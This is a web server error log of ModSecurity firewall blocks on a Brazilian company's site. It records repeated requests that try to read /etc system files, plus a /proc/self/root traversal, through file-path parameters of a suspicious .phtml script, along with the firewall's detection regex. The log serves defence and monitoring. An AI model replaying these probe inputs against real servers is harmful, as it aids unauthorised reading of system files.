[Thu Mar 19 13:21:20.821247 2026] [:error] [pid 26799:tid 140411649607424] [client 57.141.18.53:48136] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwigNa6ubjKNq_cu4ZppQAAA0s"]
[Thu Mar 19 13:21:20.823020 2026] [:error] [pid 27403:tid 140411574073088] [client 57.141.18.84:48126] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwifxkFeYa1D6dYQnAEFAAAAdQ"]
[Thu Mar 19 13:21:20.827387 2026] [:error] [pid 27403:tid 140411641214720] [client 57.141.18.33:48140] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwigBkFeYa1D6dYQnAEFQAAAcw"]
[Thu Mar 19 13:21:20.828126 2026] [:error] [pid 26799:tid 140411691570944] [client 57.141.18.38:48128] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwif9a6ubjKNq_cu4ZppAAAA0Y"]
[Thu Mar 19 13:21:20.828833 2026] [:error] [pid 17887:tid 140411741927168] [client 57.141.18.118:48132] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/favicon.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwifwkwaGbbGflqUZDaegAAAMA"]
[Thu Mar 19 13:21:21.201334 2026] [:error] [pid 31803:tid 140411674785536] [client 57.141.18.50:48156] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwigeyqAr6etmhZHNpywwAAAEg"]
[Thu Mar 19 13:21:21.484109 2026] [:error] [pid 31803:tid 140411582465792] [client 57.141.18.71:48164] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwigeyqAr6etmhZHNpyxAAAAFM"]
[Thu Mar 19 13:21:22.005935 2026] [:error] [pid 30077:tid 140411691570944] [client 57.141.18.53:48170] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwigvu8EFLIOrSqIpu7XwAAAkY"]
[Thu Mar 19 13:21:22.334728 2026] [:error] [pid 30077:tid 140411658000128] [client 57.141.18.40:48178] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwigvu8EFLIOrSqIpu7YAAAAko"]
[Thu Mar 19 13:21:22.800348 2026] [:error] [pid 27293:tid 140411582465792] [client 57.141.18.61:48188] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwigv-YZRR_7pZ7nDKeUAAAA9M"]
[Thu Mar 19 13:21:23.151562 2026] [:error] [pid 26799:tid 140411616036608] [client 57.141.18.53:48180] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwig9a6ubjKNq_cu4ZppwAAA08"]
[Thu Mar 19 13:21:23.476117 2026] [:error] [pid 17887:tid 140411733534464] [client 57.141.18.81:48202] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwigwkwaGbbGflqUZDafAAAAME"]
[Thu Mar 19 13:21:23.619621 2026] [:error] [pid 26799:tid 140411733534464] [client 57.141.18.121:48204] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwig9a6ubjKNq_cu4ZpqAAAA0E"]
[Thu Mar 19 13:21:24.348367 2026] [:error] [pid 14269:tid 140411540502272] [client 57.141.18.67:48212] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwihAbLMZ6AikZjR9VwUwAAABg"]
[Thu Mar 19 13:21:24.532244 2026] [:error] [pid 17887:tid 140411699963648] [client 57.141.18.104:48218] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwihAkwaGbbGflqUZDafQAAAMU"]
[Thu Mar 19 13:21:24.736164 2026] [:error] [pid 31803:tid 140411624429312] [client 57.141.18.100:48220] [client 57.141.18.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwihOyqAr6etmhZHNpyxQAAAE4"]
[Thu Mar 19 13:21:24.921305 2026] [:error] [pid 27293:tid 140411725141760] [client 57.141.18.16:48228] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwihP-YZRR_7pZ7nDKeUgAAA8I"]
[Thu Mar 19 13:21:25.904279 2026] [:error] [pid 31803:tid 140411548894976] [client 57.141.18.33:48236] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiheyqAr6etmhZHNpyxgAAAFc"]
[Thu Mar 19 13:21:26.563580 2026] [:error] [pid 14269:tid 140411741927168] [client 57.141.18.27:48246] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwihgbLMZ6AikZjR9VwVAAAAAA"]
[Thu Mar 19 13:21:26.922348 2026] [:error] [pid 19093:tid 140411666392832] [client 57.141.18.73:48260] [client 57.141.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwihl_V7PWP6ixUYl7PkAAAAok"]
[Thu Mar 19 13:21:27.186755 2026] [:error] [pid 27403:tid 140411699963648] [client 57.141.18.12:48270] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwihxkFeYa1D6dYQnAEFwAAAcU"]
[Thu Mar 19 13:21:27.218879 2026] [:error] [pid 31803:tid 140411725141760] [client 57.141.18.66:48272] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwih-yqAr6etmhZHNpyxwAAAEI"]
[Thu Mar 19 13:21:27.382030 2026] [:error] [pid 15826:tid 140411565680384] [client 57.141.18.110:48274] [client 57.141.18.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwih-oXxyEfFpUF8f8f3QAAAVU"]
[Thu Mar 19 13:21:27.555116 2026] [:error] [pid 27293:tid 140411540502272] [client 57.141.18.28:48282] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwih_-YZRR_7pZ7nDKeVAAAA9g"]
[Thu Mar 19 13:21:27.671548 2026] [:error] [pid 27293:tid 140411624429312] [client 57.141.18.121:48286] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwih_-YZRR_7pZ7nDKeVQAAA84"]
[Thu Mar 19 13:21:28.329935 2026] [:error] [pid 30077:tid 140411607643904] [client 57.141.18.3:48298] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiiPu8EFLIOrSqIpu7YgAAAlA"]
[Thu Mar 19 13:21:28.707734 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:51504] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwiiMdf6f5d65gmYZSMHgAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Thu Mar 19 13:21:28.782544 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.228.61:39280] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwiiAkwaGbbGflqUZDagAAAANY"]
[Thu Mar 19 13:21:28.852310 2026] [:error] [pid 27293:tid 140411649607424] [client 57.141.18.109:48318] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiiP-YZRR_7pZ7nDKeVgAAA8s"]
